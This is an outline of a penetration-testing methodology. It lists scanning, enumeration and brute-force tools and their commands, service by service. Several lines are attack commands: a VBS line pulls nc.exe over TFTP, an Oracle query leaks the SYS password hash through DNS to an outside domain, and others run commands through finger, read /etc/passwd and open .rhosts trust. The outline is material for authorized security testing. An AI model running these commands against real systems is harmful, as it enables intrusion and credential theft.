Penetration Testing Framework 0.58

1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1

1.1.1.1. cmd.exe

1.1.2. 2

1.1.2.1. echo off

1.1.2.2. command

1.1.2.3. echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. alternative functionality

1.2.5.1. objShell.Run "%comspec% /k c: & dir"

1.2.5.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"

1.2.5.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool

1.3.1.1. Reconnaissance

1.3.1.2. FileSystem Links

1.3.1.3. Common Dialogs

1.3.1.4. Application Handlers

1.3.1.5. Browser Plugins

1.3.1.6. iKAT Tools

1.4. AT Command - privilege escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k

1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10)

1.5.6.1. Save Image As

1.5.6.2. View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB

1.5.16. ALT+MINUS: ALT+SHIFT+TAB

2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication Method

3.1.2.1. Xauth

3.1.2.2. Xhost

3.2. X11 Exploitation

3.2.1. xwd

3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

3.2.2. Keystrokes

3.2.2.1. Received

3.2.2.2. Transmitted

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config

3.3.6.1. DisplayManager*authorize:on

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. Pre-Inspection Visit - template

12. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting (TCP/IP stack fingerprinting) is the process of determining the operating system in use on a remote host. This is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and waits for a reply (or the lack of one). Disparate OSes respond differently to certain types of packet (the response is governed by an RFC and by any proprietary behaviour the vendor, notably Microsoft, has enabled within the system), so custom packets may be sent. Remote applications being served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of which applications are running and tailor the test accordingly.

12.1. Default Port Lists

12.1.1. Windows

12.1.2. *nix

12.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

12.2.1. General Enumeration Tools

12.2.1.1. nmap

12.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml

12.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

12.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

12.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

12.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

12.2.1.2. netcat

12.2.1.2.1. nc -v -n IP_Address port

12.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

12.2.1.3. amap

12.2.1.3.1. amap -bqv 192.168.1.1 80

12.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

12.2.1.4. xprobe2

12.2.1.4.1. xprobe2 192.168.1.1

12.2.1.5. sinfp

12.2.1.5.1. ./sinfp.pl -i -p

12.2.1.6. nbtscan

12.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

12.2.1.7. hping

12.2.1.7.1. hping ip_address

12.2.1.8. scanrand

12.2.1.8.1. scanrand ip_address:all

12.2.1.9. unicornscan

12.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

12.2.1.10. netenum

12.2.1.10.1. netenum network/netmask timeout

12.2.1.11. fping

12.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

12.2.2. Firewall Specific Tools

12.2.2.1. firewalk

12.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

12.2.2.2. ftester

12.2.2.2.1. On host 1: ./ftestd -i eth0 -v; on host 2: ./ftest -f ftest.conf -v -d 0.01; then ./freport ftest.log ftestd.log

12.2.3. Default Passwords (Examine list)

12.2.3.1. Passwords A

12.2.3.2. Passwords B

12.2.3.3. Passwords C

12.2.3.4. Passwords D

12.2.3.5. Passwords E

12.2.3.6. Passwords F

12.2.3.7. Passwords G

12.2.3.8. Passwords H

12.2.3.9. Passwords I

12.2.3.10. Passwords J

12.2.3.11. Passwords K

12.2.3.12. Passwords L

12.2.3.13. Passwords M

12.2.3.14. Passwords N

12.2.3.15. Passwords O

12.2.3.16. Passwords P

12.2.3.17. Passwords R

12.2.3.18. Passwords S

12.2.3.19. Passwords T

12.2.3.20. Passwords U

12.2.3.21. Passwords V

12.2.3.22. Passwords W

12.2.3.23. Passwords X

12.2.3.24. Passwords Y

12.2.3.25. Passwords Z

12.2.3.26. Passwords (Numeric)

12.3. Active Hosts

12.3.1. Open TCP Ports

12.3.2. Closed TCP Ports

12.3.3. Open UDP Ports

12.3.4. Closed UDP Ports

12.3.5. Service Probing

12.3.5.1. SMTP Mail Bouncing

12.3.5.2. Banner Grabbing

12.3.5.2.1. Other

12.3.5.2.2. HTTP

12.3.5.2.3. HTTPS

12.3.5.2.4. SMTP

12.3.5.2.5. POP3

12.3.5.2.6. FTP

12.3.6. ICMP Responses

12.3.6.1. Type 3 (Port Unreachable)

12.3.6.2. Type 8 (Echo Request)

12.3.6.3. Type 13 (Timestamp Request)

12.3.6.4. Type 15 (Information Request)

12.3.6.5. Type 17 (Subnet Address Mask Request)

12.3.6.6. Responses from broadcast address

12.3.7. Source Port Scans

12.3.7.1. TCP/UDP 53 (DNS)

12.3.7.2. TCP 20 (FTP Data)

12.3.7.3. TCP 80 (HTTP)

12.3.7.4. TCP/UDP 88 (Kerberos)

12.3.8. Firewall Assessment

12.3.8.1. Firewalk

12.3.8.2. TCP/UDP/ICMP responses

12.3.9. OS Fingerprint

13. Enumeration

13.1. Daytime port 13 open

13.1.1. nmap nse script

13.1.1.1. daytime

13.2. FTP port 21 open

13.2.1. Fingerprint server

13.2.1.1. telnet ip_address 21 (Banner grab)

13.2.1.2. Run command ftp ip_address

13.2.1.3. [email protected]

13.2.1.4. Check for anonymous access

13.2.1.4.1. ftp ip_address (Username: anonymous OR anon; Password: [email protected])

13.2.2. Password guessing

13.2.2.1. Hydra brute force

13.2.2.2. medusa

13.2.2.3. Brutus

13.2.3. Examine configuration files

13.2.3.1. ftpusers

13.2.3.2. ftp.conf

13.2.3.3. proftpd.conf

13.2.4. MiTM

13.2.4.1. pasvagg.pl

13.3. SSH port 22 open

13.3.1. Fingerprint server

13.3.1.1. telnet ip_address 22 (banner grab)

13.3.1.2. scanssh

13.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

13.3.2. Password guessing

13.3.2.1. ssh root@ip_address

13.3.2.2. guess-who

13.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

13.3.2.3. Hydra brute force

13.3.2.4. brutessh

13.3.2.5. Ruby SSH Bruteforcer

13.3.3. Examine configuration files

13.3.3.1. ssh_config

13.3.3.2. sshd_config

13.3.3.3. authorized_keys

13.3.3.4. ssh_known_hosts

13.3.3.5. .shosts

13.3.4. SSH Client programs

13.3.4.1. tunnelier

13.3.4.2. winsshd

13.3.4.3. putty

13.3.4.4. winscp

13.4. Telnet port 23 open

13.4.1. Fingerprint server

13.4.1.1. telnet ip_address

13.4.1.1.1. Common Banner List (OS: Banner)

13.4.1.1.1.1. Solaris 8: SunOS 5.8

13.4.1.1.1.2. Solaris 2.6: SunOS 5.6

13.4.1.1.1.3. Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)

13.4.1.1.1.4. SunOS 4.1.x: SunOS Unix (hostname)

13.4.1.1.1.5. FreeBSD: FreeBSD/i386 (hostname) (ttyp1)

13.4.1.1.1.6. NetBSD: NetBSD/i386 (hostname) (ttyp1)

13.4.1.1.1.7. OpenBSD: OpenBSD/i386 (hostname) (ttyp1)

13.4.1.1.1.8. Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)

13.4.1.1.1.9. Debian 3.0: Debian GNU/Linux 3.0 / hostname

13.4.1.1.1.10. SGI IRIX 6.x: IRIX (hostname)

13.4.1.1.1.11. IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.

13.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.

13.4.1.1.1.13. Nokia IPSO: IPSO (hostname) (ttyp0)

13.4.1.1.1.14. Cisco IOS: User Access Verification

13.4.1.1.1.15. Livingston ComOS: ComOS - Livingston PortMaster

13.4.1.2. telnetfp

13.4.2. Password Attack

13.4.2.2. Brutus

13.4.2.3. Hydra brute force

13.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

13.4.3. Examine configuration files

13.4.3.1. /etc/xinetd.d/telnet

13.4.3.2. /etc/xinetd.d/stelnet

13.5. Sendmail Port 25 open

13.5.1. Fingerprint server

13.5.1.1. telnet ip_address 25 (banner grab)

13.5.2. Mail Server Testing

13.5.2.1. Enumerate users

13.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

13.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

13.5.2.2. Mail Spoof Test

13.5.2.2.1. Commands sent in sequence

13.5.2.2.1.1. HELO anything

13.5.2.2.1.2. MAIL FROM: spoofed_address

13.5.2.2.1.3. RCPT TO: valid_mail_account

13.5.2.2.1.4. DATA

13.5.2.2.1.5. . (a line containing only a dot ends the message)

13.5.2.2.1.6. QUIT

13.5.2.3. /etc/inetd.conf

13.5.2.4. Mail Relay Test

13.5.3. Examine Configuration Files

13.5.3.1. sendmail.cf

13.5.3.2. submit.cf

13.6. DNS port 53 open

13.6.1. Fingerprint server/ service

13.6.1.1. host

13.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]

13.6.1.1.1.1. -v verbose format

13.6.1.1.1.2. -t (query type) allows a user to specify a record type, i.e. A, NS, or PTR

13.6.1.1.1.3. -a same as -t ANY

13.6.1.1.1.4. -l zone transfer (if allowed)

13.6.1.1.1.5. -f save to a specified filename

13.6.1.2. nslookup

13.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

13.6.1.3. dig

13.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

13.6.1.4. whois

13.6.1.4.1. -h Use the named host to resolve the query

13.6.1.4.2. -a Use ARIN to resolve the query

13.6.1.4.3. -r Use RIPE to resolve the query

13.6.1.4.4. -p Use APNIC to resolve the query

13.6.1.4.5. -Q Perform a quick lookup

13.6.2. DNS Enumeration

13.6.2.1. Bile Suite

13.6.2.1.1. perl BiLE.pl [website] [project_name]

13.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

13.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

13.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

13.6.2.1.5. perl exp-tld.pl [input file] [output file]

13.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

13.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]

13.6.2.2. txdns

13.6.2.2.1. txdns -rt -t domain_name

13.6.2.2.2. txdns -x 50 -bb domain_name

13.6.2.3. nmap nse scripts

13.6.2.3.1. dns-random-srcport

13.6.2.3.2. dns-random-txid

13.6.2.3.3. dns-recursion

13.6.2.3.4. dns-zone-transfer

13.6.3. Examine Configuration Files

13.6.3.1. host.conf

13.6.3.2. resolv.conf

13.6.3.3. named.conf

13.7. perl qtrace.pl [ip_address_file] [output_file]

13.8. TFTP port 69 open

13.8.1. TFTP Enumeration

13.8.1.1. tftp ip_address PUT local_file

13.8.1.2. tftp ip_address GET conf.txt (or other files)

13.8.1.3. Solarwinds TFTP server

13.8.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)

13.8.2. TFTP Bruteforcing

13.8.2.1. TFTP bruteforcer

13.8.2.2. Cisco-Torch

13.9. Finger Port 79 open

13.9.1. User enumeration

13.9.1.1. finger 'a b c d e f g h' @example.com

13.9.1.2. finger [email protected]

13.9.1.3. finger [email protected]

13.9.1.4. finger [email protected]

13.9.1.5. finger [email protected]

13.9.1.6. finger **@example.com

13.9.1.7. finger [email protected]

13.9.1.8. finger @example.com

13.9.1.9. nmap nse script

13.9.1.9.1. finger

13.9.2. Command execution

13.9.2.1. finger "|/bin/[email protected]"

13.9.2.2. finger "|/bin/ls -a /@example.com"

13.9.3. Finger Bounce

13.9.3.1. finger user@host@victim

13.9.3.2. finger @internal@external

13.10. Web Ports 80,8080 etc. open

13.10.1. Fingerprint server

13.10.1.1. Telnet ip_address port

13.10.1.2. Firefox plugins

13.10.1.2.1. All

13.10.1.2.2. Specific

13.10.2. Crawl website

13.10.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)

13.10.2.2. httprint

13.10.2.3. Metagoofil

13.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

13.10.3. Web Directory enumeration

13.10.3.1. Nikto

13.10.3.1.1. nikto [-h target] [options]

13.10.3.2. DirBuster

13.10.3.3. Wikto

13.10.3.4. Goolag Scanner

13.10.4. Vulnerability Assessment

13.10.4.1. Manual Tests

13.10.4.1.1. Default Passwords

13.10.4.1.2. Install Backdoors

13.10.4.1.3. Method Testing

13.10.4.1.4. Upload Files

13.10.4.1.5. View Page Source

13.10.4.1.6. Input Validation Checks

13.10.4.1.7. Automated table and column iteration

13.10.4.2. Vulnerability Scanners

13.10.4.2.1. Acunetix

13.10.4.2.2. Grendelscan

13.10.4.2.3. NStealth

13.10.4.2.4. Obiwan III

13.10.4.2.5. w3af

13.10.4.3. Specific Applications/ Server Tools

13.10.4.3.1. Domino

13.10.4.3.2. Joomla

13.10.4.3.3. aspaudit.pl

13.10.4.3.4. Vbulletin

13.10.4.3.5. ZyXel

13.10.5. Proxy Testing

13.10.5.1. Burpsuite

13.10.5.2. Crowbar

13.10.5.3. Interceptor

13.10.5.4. Paros

13.10.5.5. Requester Raw

13.10.5.6. Suru

13.10.5.7. WebScarab

13.10.6. Examine configuration files

13.10.6.1. Generic

13.10.6.1.1. Examine httpd.conf/ windows config files

13.10.6.2. JBoss

13.10.6.2.1. JMX Console http://<IP>:8080/jmx-console/

13.10.6.3. Joomla

13.10.6.3.1. configuration.php

13.10.6.3.2. diagnostics.php

13.10.6.3.3. joomla.inc.php

13.10.6.3.4. config.inc.php

13.10.6.4. Mambo

13.10.6.4.1. configuration.php

13.10.6.4.2. config.inc.php

13.10.6.5. Wordpress

13.10.6.5.1. setup-config.php

13.10.6.5.2. wp-config.php

13.10.6.6. ZyXel

13.10.6.6.1. /WAN.html (contains PPPoE ISP password)

13.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

13.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)

13.10.6.6.4. /Firewall_DefPolicy.html (Firewall)

13.10.6.6.5. /CF_Keyword.html (Content Filter)

13.10.6.6.6. /RemMagWWW.html (Remote MGMT)

13.10.6.6.7. /rpSysAdmin.html (System)

13.10.6.6.8. /LAN_IP.html (LAN)

13.10.6.6.9. /NAT_General.html (NAT)

13.10.6.6.10. /ViewLog.html (Logs)

13.10.6.6.11. /rpFWUpload.html (Tools)

13.10.6.6.12. /DiagGeneral.html (Diagnostic)

13.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)

13.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

13.10.6.6.15. Config Backups

13.10.7. Examine web server logs

13.10.7.1. c:\winnt\system32\Logfiles\W3SVC1

13.10.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq

13.10.8. References

13.10.8.1. White Papers

13.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

13.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

13.10.8.1.3. Blind Security Testing - An Evolutionary Approach

13.10.8.1.4. Command Injection in XML Signatures and Encryption

13.10.8.1.5. Input Validation Cheat Sheet

13.10.8.1.6. SQL Injection Cheat Sheet

13.10.8.2. Books

13.10.8.2.1. Hacking Exposed Web 2.0

13.10.8.2.2. Hacking Exposed Web Applications

13.10.8.2.3. The Web Application Hacker's Handbook

13.10.9. Exploit Frameworks

13.10.9.1. Brute-force Tools

13.10.9.1.1. Acunetix

13.10.9.2. Metasploit

13.10.9.3. w3af

13.11. Portmapper port 111 open

13.11.1. rpcdump.py

13.11.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

13.11.2. rpcinfo

13.11.2.1. rpcinfo [options] IP_Address

13.12. NTP Port 123 open

13.12.1. NTP Enumeration

13.12.1.1. ntpdc -c monlist IP_ADDRESS

13.12.1.2. ntpdc -c sysinfo IP_ADDRESS

13.12.1.3. ntpq

13.12.1.3.1. host

13.12.1.3.2. hostname

13.12.1.3.3. ntpversion

13.12.1.3.4. readlist

13.12.1.3.5. version

13.12.2. Examine configuration files

13.12.2.1. ntp.conf

13.12.3. nmap nse script

13.12.3.1. ntp-info

13.13. NetBIOS Ports 135-139,445 open

13.13.1. NetBIOS enumeration

13.13.1.1. Enum

13.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

13.13.1.2. Null Session

13.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

13.13.1.3. Smbclient

13.13.1.3.1. smbclient -L //server/share password options

13.13.1.4. Superscan

13.13.1.4.1. Enumeration tab.

13.13.1.5. user2sid/sid2user

13.13.1.6. Winfo

13.13.2. NetBIOS brute force

13.13.2.1. Hydra

13.13.2.2. Brutus

13.13.2.3. Cain & Abel

13.13.2.4. getacct

13.13.2.5. NAT (NetBIOS Auditing Tool)

13.13.3. Examine Configuration Files

13.13.3.1. Smb.conf

13.13.3.2. lmhosts

13.14. SNMP port 161 open

13.14.1. Default Community Strings

13.14.1.1. public

13.14.1.2. private

13.14.1.3. cisco

13.14.1.3.1. cable-docsis

13.14.1.3.2. ILMI

13.14.2. MIB enumeration

13.14.2.1. Windows NT

13.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

13.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

13.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

13.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

13.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

13.14.2.2. Solarwinds MIB walk

13.14.2.3. Getif

13.14.2.4. snmpwalk

13.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

13.14.2.5. Snscan

13.14.2.6. Applications

13.14.2.6.1. ZyXel

13.14.2.7. nmap nse script

13.14.2.7.1. snmp-sysdescr

13.14.3. SNMP Bruteforce

13.14.3.1. onesixtyone

13.14.3.1.1. onesixtyone -c SNMP.wordlist <IP>

13.14.3.2. cat

13.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist

13.14.3.3. Solarwinds SNMP Brute Force

13.14.3.4. ADMsnmp

13.14.3.5. nmap nse script

13.14.3.5.1. snmp-brute

13.14.4. Examine SNMP Configuration files

13.14.4.1. snmp.conf

13.14.4.2. snmpd.conf

13.14.4.3. snmp-config.xml

13.15. LDAP Port 389 Open

13.15.1. ldap enumeration

13.15.1.1. ldapminer

13.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

13.15.1.2. luma

13.15.1.2.1. Gui based tool

13.15.1.3. ldp

13.15.1.3.1. Gui based tool

13.15.1.4. openldap

13.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

13.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

13.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

13.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

13.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

13.15.2. ldap brute force

13.15.2.1. bf_ldap

13.15.2.1.1. bf_ldap -s server -d domain_name (-u username | -U users_list_file) (-L passwords_list | -l length_of_passwords_to_generate) [-p port (default 389)] [-v (verbose mode)] [-P LDAP user path (default ,CN=Users,)]

13.15.2.2. K0ldS

13.15.2.3. LDAP_Brute.pl

13.15.3. Examine Configuration Files

13.15.3.1. General

13.15.3.1.1. containers.ldif

13.15.3.1.2. ldap.cfg

13.15.3.1.3. ldap.conf

13.15.3.1.4. ldap.xml

13.15.3.1.5. ldap-config.xml

13.15.3.1.6. ldap-realm.xml

13.15.3.1.7. slapd.conf

13.15.3.2. IBM SecureWay V3 server

13.15.3.2.1. V3.sas.oc

13.15.3.3. Microsoft Active Directory server

13.15.3.3.1. msadClassesAttrs.ldif

13.15.3.4. Netscape Directory Server 4

13.15.3.4.1. nsslapd.sas_at.conf

13.15.3.4.2. nsslapd.sas_oc.conf

13.15.3.5. OpenLDAP directory server

13.15.3.5.1. slapd.sas_at.conf

13.15.3.5.2. slapd.sas_oc.conf

13.15.3.6. Sun ONE Directory Server 5.1

13.15.3.6.1. 75sas.ldif

13.16. PPTP/L2TP/VPN port 500/1723 open

13.16.1. Enumeration

13.16.1.1. ike-scan

13.16.1.2. ike-probe

13.16.2. Brute-Force

13.16.2.1. ike-crack

13.16.3. Reference Material

13.16.3.1. PSK cracking paper

13.16.3.2. SecurityFocus Infocus

13.16.3.3. Scanning a VPN Implementation

13.17. Modbus port 502 open

13.17.1. modscan

13.18. rlogin port 513 open

13.18.1. Rlogin Enumeration

13.18.1.1. Find the files

13.18.1.1.1. find / -name .rhosts

13.18.1.1.2. locate .rhosts

13.18.1.2. Examine Files

13.18.1.2.1. cat .rhosts

13.18.1.3. Manual Login

13.18.1.3.1. rlogin hostname -l username

13.18.1.3.2. rlogin <IP>

13.18.1.4. Subvert the files

13.18.1.4.1. echo ++ > .rhosts

13.18.2. Rlogin Brute force

13.18.2.1. Hydra

13.19. rsh port 514 open

13.19.1. Rsh Enumeration

13.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

13.19.2. Rsh Brute Force

13.19.2.1. rsh-grind

13.19.2.2. Hydra

13.19.2.3. medusa

13.20. SQL Server Ports 1433, 1434 open

13.20.1. SQL Enumeration

13.20.1.1. piggy

13.20.1.2. SQLPing

13.20.1.2.1. sqlping ip_address/hostname

13.20.1.3. SQLPing2

13.20.1.4. SQLPing3

13.20.1.5. SQLpoke

13.20.1.6. SQL Recon

13.20.1.7. SQLver

13.20.2. SQL Brute Force

13.20.2.1. SQLPAT

13.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

13.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

13.20.2.2. SQL Dict

13.20.2.3. SQLAT

13.20.2.4. Hydra

13.20.2.5. SQLlhf

13.20.2.6. ForceSQL

13.21. Citrix port 1494 open

13.21.1. Citrix Enumeration

13.21.1.1. Default Domain

13.21.1.2. Published Applications

13.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

13.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

13.21.2. Citrix Brute Force

13.21.2.1. bforce.js

13.21.2.2. connect.js

13.21.2.3. Citrix Brute-forcer

13.21.2.4. Reference Material

13.21.2.4.1. Hacking Citrix - the legitimate backdoor

13.21.2.4.2. Hacking Citrix - the forceful way

13.22. Oracle Port 1521 Open

13.22.1. Oracle Enumeration

13.22.1.1. oracsec

13.22.1.2. Repscan

13.22.1.3. Sidguess

13.22.1.4. Scuba

13.22.1.5. DNS/HTTP Enumeration

13.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;

13.22.1.6. WinSID

13.22.1.7. Oracle default password list

13.22.1.8. TNSVer

13.22.1.8.1. tnsver host [port]

13.22.1.9. TCP Scan

13.22.1.10. Oracle TNSLSNR

13.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

13.22.1.11. TNSCmd

13.22.1.11.1. perl tnscmd.pl -h ip_address

13.22.1.11.2. perl tnscmd.pl version -h ip_address

13.22.1.11.3. perl tnscmd.pl status -h ip_address

13.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

13.22.1.12. LSNrCheck

13.22.1.13. Oracle Security Check (needs credentials)

13.22.1.14. OAT

13.22.1.14.1. sh opwg.sh -s ip_address

13.22.1.14.2. opwg.bat -s ip_address

13.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

13.22.1.15. OScanner

13.22.1.15.1. sh oscanner.sh -s ip_address

13.22.1.15.2. oscanner.exe -s ip_address

13.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

13.22.1.15.4. reportviewer.exe oscanner_saved_file.xml

13.22.1.16. NGS Squirrel for Oracle

13.22.1.17. Service Register

13.22.1.17.1. Service-register.exe ip_address

13.22.1.18. PLSQL Scanner 2008

13.22.2. Oracle Brute Force

13.22.2.1. OAK

13.22.2.1.1. ora-getsid hostname port sid_dictionary_list

13.22.2.1.2. ora-auth-alter-session host port sid username password sql

13.22.2.1.3. ora-brutesid host port start

13.22.2.1.4. ora-pwdbrute host port sid username password-file

13.22.2.1.5. ora-userenum host port sid userlistfile

13.22.2.1.6. ora-ver -e (-f -l -a) host port

13.22.2.2. breakable (Targets Application Server Port)

13.22.2.2.1. breakable.exe host url [port] [v] (host: ip_address of the Oracle Portal Server; url: PATH_INFO, i.e. /pls/orasso; port: TCP port the Oracle Portal Server is serving pages from; v: verbose)

13.22.2.3. SQLInjector (Targets Application Server Port)

13.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

